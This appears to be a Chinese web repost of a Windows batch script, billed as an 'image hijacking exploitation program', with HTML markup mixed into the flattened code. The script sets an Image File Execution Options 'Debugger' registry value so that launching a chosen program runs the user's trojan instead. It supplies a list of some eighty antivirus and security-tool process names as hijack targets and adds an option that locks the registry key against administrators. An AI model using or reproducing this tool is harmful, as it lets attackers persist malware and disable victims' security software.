- 软件
//
//
//
//
//
//
//
//
//
//
软件Tags:
NT系统在试图执行一个从命令行调用的可执行文件运行请求时,先会检查运行程序是不是可执行文件,如果是的话,再检查格式的,然后就会检查是否存在。。如果不存在的话,它会提示系统找不到文件或 者是“指定的路径不正确等等。复制代码
代码如下:@shift 1@Echo Offcolor f0title Windows映像劫持利用程序-By Mice:clearautoclsEcho.Echo Windows映像劫持利用程序Echo.Echo 制作:Mice <a href="//WwW.Mice33.Cn">Http://WwW.Mice33.Cn</a>Echo.Echo 映像胁持的基本原理:Echo NT系统在试图执行一个从命令行调用的可执行文件运行请求时,先会检查运行程序是不是可执行文件,如果是的话,再检查格式的,然后就会检查是否存在。。如果不存在的话,它会提示系统找不到文件或 者是“指定的路径不正确等等。。 Echo.Echo [1] 哈哈我来利用咯Echo [2] 看看常用杀毒软件进程名称Echo [3] 修补漏洞Echo [0] 退出Echo.Set /p clearslt= 请输入您的选择(1/2/3/0):If "%clearslt%"=="" Goto clearautoIf "%clearslt%"=="1" Goto clearauto1If "%clearslt%"=="2" Goto changyongIf "%clearslt%"=="3" Goto budongIf "%clearslt%"=="0" Exitecho 请选择编号pauseGoto clearauto</span></p><p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋体; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:clearauto1rem 定义文件名set /p file1= 请输入你要挟持的文件名(如avp.exe,rav,exe)set /p file2= 请输入你木马的绝对路径(如c:windowsxx.exe)echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options%file1%] >mice.regregedit /s mice.reg & del /q mice.reg</span></p><p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋体; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options%file1%" /f /v "Debugger" /t reg_sz /d "%file2%"del /q cy.txtclsEcho 添加成功.赶快把文件名改成%file1%来测试下吧.pause>nulGoto clearauto</span></p><p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋体; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:changyongrem 常用软件名echo 常用杀毒软件 >>cy.txtecho avp.exe >>cy.txtecho AgentSvr.exe >>cy.txtecho CCenter.exe>>cy.txtecho Rav.exe>>cy.txtecho RavMonD.exe>>cy.txtecho RavStub.exe>>cy.txtecho RavTask.exe>>cy.txtecho rfwcfg.exe>>cy.txtecho rfwsrv.exe>>cy.txtecho RsAgent.exe>>cy.txtecho Rsaupd.exe>>cy.txtecho runiep.exe>>cy.txtecho SmartUp.exe>>cy.txtecho FileDsty.exe>>cy.txtecho RegClean.exe>>cy.txtecho 360tray.exe>>cy.txtecho 360Safe.exe>>cy.txtecho 360rpt.exe>>cy.txtecho kabaload.exe>>cy.txtecho safelive.exe>>cy.txtecho Ras.exe>>cy.txtecho KASMain.exe>>cy.txtecho KASTask.exe>>cy.txtecho KAV32.exe>>cy.txtecho KAVDX.exe>>cy.txtecho KAVStart.exe>>cy.txtecho KISLnchr.exe>>cy.txtecho KMailMon.exe>>cy.txtecho KMFilter.exe>>cy.txtecho KPFW32.exe>>cy.txtecho KPFW32X.exe>>cy.txtecho KPFWSvc.exe>>cy.txtecho KWatch9x.exe>>cy.txtecho KWatch.exe>>cy.txtecho KWatchX.exe>>cy.txtecho TrojanDetector.exe>>cy.txtecho UpLive.EXE.exe>>cy.txtecho KVSrvXP.exe>>cy.txtecho KvDetect.exe>>cy.txtecho KRegEx.exe>>cy.txtecho kvol.exe>>cy.txtecho kvolself.exe>>cy.txtecho kvupload.exe>>cy.txtecho kvwsc.exe>>cy.txtecho UIHost.exe>>cy.txtecho IceSword.exe>>cy.txtecho iparmo.exe>>cy.txtecho mmsk.exe>>cy.txtecho adam.exe>>cy.txtecho MagicSet.exe>>cy.txtecho PFWLiveUpdate.exe>>cy.txtecho SREng.exe>>cy.txtecho WoptiClean.exe>>cy.txtecho scan32.exe>>cy.txtecho shcfg32.exe>>cy.txtecho mcconsol.exe>>cy.txtecho HijackThis.exe>>cy.txtecho mmqczj.exe>>cy.txtecho Trojanwall.exe>>cy.txtecho FTCleanerShell.exe>>cy.txtecho loaddll.exe>>cy.txtecho rfwProxy.exe>>cy.txtecho KsLoader.exe>>cy.txtecho KvfwMcl.exe>>cy.txtecho autoruns.exe>>cy.txtecho AppSvc32.exe>>cy.txtecho ccSvcHst.exe>>cy.txtecho isPwdSvc.exe>>cy.txtecho symlcsvc.exe>>cy.txtecho nod32kui.exe>>cy.txtecho avgrssvc.exe>>cy.txtecho RfwMain.exe>>cy.txtecho KAVPFW.exe>>cy.txtecho Iparmor.exe>>cy.txtecho nod32krn.exe>>cy.txtecho PFW.exe>>cy.txtecho RavMon.exe>>cy.txtecho KAVSetup.exe>>cy.txtecho NAVSetup.exe>>cy.txtecho SysSafe.exe>>cy.txtecho QHSET.exe>>cy.txtecho zxsweep.exe>>cy.txtecho AvMonitor.exe>>cy.txtecho UmxCfg.exe>>cy.txtecho UmxFwHlp.exe>>cy.txtecho UmxPol.exe>>cy.txtecho UmxAgent.exe>>cy.txtecho UmxAttachment.exe>>cy.txtcall cy.txtGoto clearauto</span></p><p><span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋体; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:budongsetacl.exe "machineSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options" /registry /deny administrators /fullsetacl.exe "machineSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options" /registry /deny system /fullEcho 修补成功.pause>nulGoto clearauto警告:运行BAT源码是一种危险的动作,如果你不熟悉,请不要尝试!
